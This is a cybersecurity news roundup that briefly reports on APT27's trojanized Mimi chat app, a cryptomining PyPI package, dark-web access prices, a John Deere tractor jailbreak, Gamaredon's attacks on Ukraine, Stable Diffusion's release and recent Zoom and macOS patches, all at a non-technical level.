Chat app used as a backdoor
Two different security reports came out over the weekend, details how the threat actor Luckymouse, also known as APT27, used a trojanized version of the messaging app Mimi as a backdoor across Windows, macOS, and Linux. Both SEKOIA and Trend Micro found Luckymouse modified Mimi to install the HyperBro trojan, resulting in a cross-platform exploit. Targets appeared limited to individuals in Taiwan and the Philippines. SEKOIA advises that macOS targeting makes this trojan particularly interesting, and could be used to target a broader swath of targets.
PyPi package drops crytominer
A malicious module named “secretslib” got released on the Python Package Index on August 6th. It was described as a module designed for “secrets matching and verification made easy.” Security researcher Ax Sharma disclosed that the module covertly runs a cryptominer directly in RAM on Linux machines, executing a Linux executable retrieved from a remote server. This left no footprint of cryptomining activity. The party behind the package used the identity of a software engineer at the Argonne National Laboratory to lend credibility. The module was downloaded 93 times prior to being removed.
Access to corporate networks sees a value dip
According to the security firm KELA, dark web markets selling initial access to corporate networks saw a dip in Q2. While the average listing per month remained flat compared to Q1, the average price for initial access fell 50% to $1,500. The median dropping from $400 in Q1 to $300 in Q2. KELA suspects two factors at play in this. One is the significant disruption in the workings of large scale threat actors like DarkSide, Conti, and Lapsus$ shutting down, with LockBit and Hive reducing overall volume of activity. This is paired with a new trend in threat groups increasingly targeting mid-sized companies. These offer a balance of lower risk while still offering significant financial reward.
Researcher roots tractors
At the DefCon security conference, a security researcher known as Sick Codes presented a new jailbreak for John Deere tractors, providing root access to the widely deployed 2630 and 4240 tractors. This jailbreak requires physical access to the tractor. Sick Codes said he’s unsure John Deere can patch this approach without implementing full disk encryption, which likely cannot be done on existing tractors. Tractor software access has been a persistent issue, with these essential pieces of farming equipment often ground-zero for right-to-repair issues.
Thanks to today’s episode sponsor, 6clicks
Text-to-image engine about to go public
With the emergence of DALL-E 2 and other text-to-image engines, we’ve heard about security and privacy implications inherent with this technology. Many of these systems can produce photorealistic output, but limited access mitigated possible damages. However the startup Stability AI released a DALL-E 2-like text-to-image AI system called Stable Diffusion to just over a thousand AI researchers, with plans for a full public launch in the coming weeks.
The engine can run on consumer GPUs with about 5 gigabytes of VRAM, producing a 512×512 pixel image. Stability AI will make Stable Diffusion available both as a cloud service with tunable filters as well as a local model for commercial purposes. The company plans to offer private models to paying customers and release tools for creating custom and fine-tuned models.
China publishes algorithm register
The Cyberspace Administration of China published a list of 30 algorithms used by many of the country’s most popular apps. Services included Taobao, WeChat, Meituan, and ByteDance’s Douyin. This gives each algorithm a classification number and a brief description. In March, China passed new regulations requiring algorithm recommendation services to disclose algorithms used in apps. The descriptions do not provide technical details on how the algorithms work, rather provide high level overviews as to their intended functions.
Gamaredon continues to hammer Ukraine with cyberattacks
A new report from security researchers at Symantec document the most recent efforts by the Russian threat group, believed to be part of Russia’s FSB intelligence agency. The group continues to target Ukraine in attack, this practice goes as far back as 2014, long predating the current conflict. Its most recent wave of attacks came from July 15th through August 8th. Attack vectors include phishing messages with a self-exctracting zip file that fetches an XML file and eventually executes a PowerShell info-stealer. Researchers also saw the group using VBS downloaders to download the Pterodo backdoor. This let the attackers turn on attached mics, log keystrokes, take screen shots, and more. The most recent attack saw the group attempting to modify Microsoft’s Word default template, which could lace all created documents with malicious code.
Your “you should have patched” Tuesday update: Patrick Wardle edition
Zoom released a patch for a “get-root” elevation of privilege bug in Zoom for Mac. Security researcher Patrick Wardle detailed the bug at Def Con. It was a big Def Con for Wardle, who also demonstrated an injection flaw with how macOS handles software updates that could allow an attacker complete file access. He reported it to Apple as part of its bug bounty program. Apple released patches in April and October 2021 to resolve the issues.